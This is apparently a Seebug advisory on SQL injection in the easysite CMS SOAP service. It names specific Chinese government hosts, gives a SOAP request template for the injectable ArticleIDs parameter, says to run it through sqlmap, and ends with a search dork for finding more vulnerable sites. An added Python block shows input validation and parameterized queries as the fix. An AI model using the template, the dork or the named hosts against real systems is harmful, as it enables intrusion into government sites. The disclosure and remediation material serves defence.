A crude SQL injection in the easysite content management system

2014-07-22T00:00:00
ID SSV:96086
Type seebug
Reporter Root
Modified 2014-07-22T00:00:00

Description

Brief description:

Web services don't lie! A large number of .gov sites run the easysite content management system.

Details:

1. SOAP injection. The easysite web service file:

http://www.py.gov.cn/DesktopModules/C_Info/WebService/C_InfoService.asmx

[Image soap.png: https://images.seebug.org/upload/201406/16205754b156bffb45e993cebd2705c5433a0a3f.png]

2. The ArticleIDs parameter is vulnerable to SQL injection

[Image sql1.png: https://images.seebug.org/upload/201406/16205943eaac7fc9387e0624469c89834d6a2f60.png]

[Image SQL2.png: https://images.seebug.org/upload/201406/162103065ae6e39928fb3b9728a50f595bbbf716.png]

Pick any one and run it through sqlmap

POST /DesktopModules/C_Info/WebService/C_InfoService.asmx HTTP/1.1
Host: dynamic.xmedu.gov.cn
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/GetArticleHitsArray"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetArticleHitsArray xmlns="http://tempuri.org/">
      <ArticleIDs>string</ArticleIDs>
    </GetArticleHitsArray>
  </soap:Body>
</soap:Envelope>

[Image sql3.png: https://images.seebug.org/upload/201406/162107259e0f64badcbb148e3305dda96ef7b887.png]
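The request above shows that GetArticleHitsArray takes ArticleIDs as a free-form string, which is the root cause. The following is an added example, not code from the advisory or from easysite: it parses a GetArticleHitsArray envelope of the shape shown above, enforces that ArticleIDs is a comma-separated list of integers, and builds a parameterized IN (...) query from the validated IDs instead of concatenating the string into SQL. The table and column names (Articles, ArticleID, Hits) and the request samples are constructed assumptions; the namespace http://tempuri.org/ and the element names come from the request on the page.

```python
import re
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

SVC_NS = "http://tempuri.org/"  # service namespace from the request on the page

# Allow-list: ArticleIDs must be one or more integers separated by commas.
ARTICLE_IDS_RE = re.compile(r"^\d+(,\d+)*$")


def extract_article_ids(envelope: bytes) -> Optional[str]:
    """Return the text of <ArticleIDs> inside <GetArticleHitsArray>, or None
    if the body is not well-formed XML or the element is missing."""
    try:
        root = ET.fromstring(envelope)
    except ET.ParseError:
        return None
    node = root.find(f".//{{{SVC_NS}}}GetArticleHitsArray/{{{SVC_NS}}}ArticleIDs")
    if node is None:
        return None
    return (node.text or "").strip()


def validate_article_ids(value: Optional[str]) -> Optional[List[int]]:
    """Strict validation: anything other than 'int,int,...' is rejected.
    Returns the parsed integers, or None when the value is not acceptable."""
    if value is None or not ARTICLE_IDS_RE.fullmatch(value):
        return None
    return [int(x) for x in value.split(",")]


def build_hits_query(ids: List[int]) -> Tuple[str, List[int]]:
    """Build a parameterized query with one placeholder per ID, so the
    database driver binds the values and no user text reaches the SQL.
    Table/column names are assumptions for the example."""
    placeholders = ", ".join("?" for _ in ids)
    sql = f"SELECT ArticleID, Hits FROM Articles WHERE ArticleID IN ({placeholders})"
    return sql, list(ids)


def classify_request(envelope: bytes) -> str:
    """Triage helper: 'ok', 'reject' (bad ArticleIDs) or 'no-articleids'."""
    value = extract_article_ids(envelope)
    if value is None:
        return "no-articleids"
    return "ok" if validate_article_ids(value) is not None else "reject"


def _envelope(article_ids: str) -> bytes:
    # Constructed sample request in the shape shown in the advisory.
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
        '<soap:Body><GetArticleHitsArray xmlns="http://tempuri.org/">'
        f"<ArticleIDs>{article_ids}</ArticleIDs>"
        "</GetArticleHitsArray></soap:Body></soap:Envelope>"
    ).encode("utf-8")


# Constructed samples: a legitimate ID list and one carrying a stray quote.
GOOD_REQUEST = _envelope("1001,1002")
BAD_REQUEST = _envelope("1001'")

if __name__ == "__main__":
    for name, req in (("good", GOOD_REQUEST), ("bad", BAD_REQUEST)):
        verdict = classify_request(req)
        print(name, verdict)
        if verdict == "ok":
            print(build_hits_query(validate_article_ids(extract_article_ids(req))))
```

The same validate-then-bind pattern applies whatever the server language is; for the .asmx service on the page the equivalent fix is to split and parse the IDs as integers in C# and pass them as SqlParameter values rather than building the IN clause from the raw string.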

Proof of vulnerability:

If you don't know who is running easysite, just google it (if you can open it): inurl:asmx DesktopModules (N domains of the General Administration of Customs all run this system)